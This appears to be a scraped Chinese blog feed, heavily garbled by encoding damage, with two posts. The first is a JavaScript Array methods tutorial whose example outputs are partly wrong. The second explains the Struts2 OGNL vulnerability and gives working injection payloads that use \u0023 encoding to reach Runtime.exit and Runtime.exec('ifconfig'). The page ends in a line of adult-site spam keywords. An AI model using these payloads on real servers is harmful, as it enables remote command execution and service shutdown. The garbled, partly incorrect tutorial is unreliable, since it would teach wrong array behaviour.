Fri, 03 Feb 2012 19:20:00 GMT

数组和function 都是对象�Q�现在熟悉JS基础Array对象�Q�有兴趣的同学一��h��复习下吧�?/p>

array.pop : 删除数组内的最后一个对�?/p>

array.shift :删除数组内的�W�一个对�?/p>

array.join: 数组内元素弄成字�W�串插入��面

array.reverse : 数组内元素倒置

array.concat : 数组合�ƈ�Q�但是谁与谁合�ƈ�Q�要注意��序

array.toString : 数组直接转�ؓ字符�Ԍ��不再是对象了

array.valueOf : 昄��原始的��|��里面有什么东�?/p>

array.sort : 以ascii代码来排列先后顺�?但是数字不能用sort��L��列。要排序请往下看�Q�有例子哦�?/p>

array.push : 数组末端��d��新对象，�q�回昄��是数�l�长�?/span>

array.slice :删除数组内对�?slice( start , end)

array.splice : 删除��d��对象

array.unshift : 前面插入对象�Q?span style="color: #0055ff">�q�回昄��是数�l�长�?/span>

array.indexOf: ��查对象是否存�?/span>

下面来显�C�Z��些例子，让我们能够更明白是如何用的，计算机又是如何操作的�?/span>

var bb = ['qq','aa','ss','ee'];

var ooo = ['Nov','August'];

alert(bb.indexOf('qq'));// �q�回0,因�ؓqq是数�l�内的一个对象，位置�?

alert(bb.pop());//�q�回ee

alert(bb.shift());//�q�回qq

alert(bb.join( and ));//�q�回qq and aa and ss and ee

alert(bb.toString());// �q�回qq,aa,ss,ee

alert(bb.valueOf());//�q�回qq,aa,ss,ee

alert(bb.sort());//�q�回aa,ee,qq,ss

alert(bb.push("Lemon","Pineapple"));//�q�回6,因�ؓ数组已有六个对象�Q�分别是�Q�qq,aa,ss,ee,Lemon,Pineapple

alert(bb.slice(0,2));//�q�回qq,aa

alert(bb.splice(1,3,'lemon'));//�q�回aa,ss,ee,从aa起删除，除去长度为：三个

alert(bb.unshift('sunny'));//�q�回5,因�ؓ数组增加了一个对象，便由4变成�?

alert(bb.concat(ooo));//�q�回qq,aa,ss,ee

alert(bb.reverse());//�q�回ee,ss,aa,qq,Nov,August

其实只要多练�l�就知道�q�些是怎么使用的了�Q�多�l�习是灵�z�M��用的前提�?/span>

数字排序�Q��用sort()�Ҏ��Q�例子如下：

var foo = [1,12,15,54,56,89,123,78];

function num(a,b) {

return a - b;

}

alert(foo.sort(num));// �q�回1,12,15,54,56,78,89,123

现在��p��试吧�Q?/span>

王小�?/a> 2012-02-04 03:20 发表评论

Mon, 09 Aug 2010 01:23:00 GMT

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')
(meh)=true&(aaa)
(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')
(\u0023foo\u003dnew%20java.lang.Boolean("false")))
&(asdf)
(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true
&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new java.lang.Boolean("false")))
&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

OGNL处理时最�l�的�l�果��是
java.lang.Runtime.getRuntime().exit(1);

----------------------------------------------------------------

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true
&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))
&(asdf)(('\u0023rt.exec("ifconfig")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

OGNL处理时最�l�的�l�果��是
java.lang.Runtime.getRuntime().exec("ifconfig")

以上为struts2.1.2版本�z�一下的一个漏�z�。首先铺垫一下，上面代码执行�l�果为停掉当前运行的容器�Q�getRuntime().exit(1);退出�?br /> 首先�q�个漏洞出现是因为OGNL 的用法�?br /> ��单的介绍一下ognl概念�ȝ��癄��吧，说一下用法：
OGNL的方法调�?
  OGNL是在�q�行时调用方法的,�q��得它无法做强制的�c�d��?OGNL会去��索一个和它方法的各个参数最接近的一个方法进行��?
  如果有多个方法满��个条�?那么OGNL��Q意调用其中的一�?(NULL和所有原始类型匹�?所以最有可能返回一个出乎意料的调用).
OGNL也支持new object()的方�?产生一个新的对�?但是除了在java.lang包里的对象外,必须指明对象所在包的全�?
OGNL支持直接调用�cȝ��静态方�?@class@method(args)
  eg�Q�@abs(-12.345);
      @Java.lang.Math@floor(3.25);
      @Java.lang.Math@Sqrt(4);
OGNL操作集合
  1操作列表Lists
   OGNL中Person in {"chinese", "japanese", '"Amercian"}
  2 操作映射
   OGNL�?{"foo" : "foovalue", "bar" : "barvalue"}
OGNL有一个简化变量机�Ӟ��在变量前加符�?�Q�，所有OGNL变量在整个表辑ּ�里是全局的�?br />   eg�Q?var
      #var = 99
      listeners.size().( #this > 100 ? 2 * #this : 20 + #this ) 调用listeners的size()�q�与100比较�Q?br />    #this为size的��|��如果大于100则是�q�回两倍的size倹{�?br />    可以�q�样创徏一个Map�Q?br />    #{“foo”: “foo value”, “bar”: “bar value” }
   #@java.util.LinkedHashMap@{“foo”: “foo value”, “bar”: “bar value” }
OGNL 上下文变�?br />   #application
  #session
  #request
  #parameters
  #attr
  以上各值分别对应应用程序的不同层次的��|��Z��辑ֈ��E�序不被恶意修改在xwork�?com.opensymphony.xwork2.interceptor.PrepareInterceptor�c�M��?可��行了�q��o�?br />   但没有过滤java中的unicode码，#的是\u0023
(未完待箋。�?

王小�?/a> 2010-08-09 09:23 发表评论

丁香网亚洲国际,欧美wwwwww,精品久久久久久久久久久久包黑料